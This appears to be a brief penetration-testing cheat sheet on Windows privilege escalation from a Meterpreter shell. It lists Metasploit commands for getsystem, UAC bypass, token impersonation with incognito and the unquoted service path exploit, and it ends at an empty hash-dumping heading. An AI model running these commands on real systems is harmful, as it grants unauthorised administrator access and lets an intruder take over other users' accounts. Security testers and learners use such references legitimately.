Table of Content


Windows

With a Meterpreter Shell

getsystem
run post/windows/gather/win_privs
bypassuac

Incognito (lateral Windows privesc)

Incognito is an extension built for lateral Windows privesc

use incognito
list_tokens -u
impersonate_token $USER

Unquoted Service Paths

See Unquoted Service Paths

use exploit/windows/local/trusted_service_path
show options
run

Dumping hashes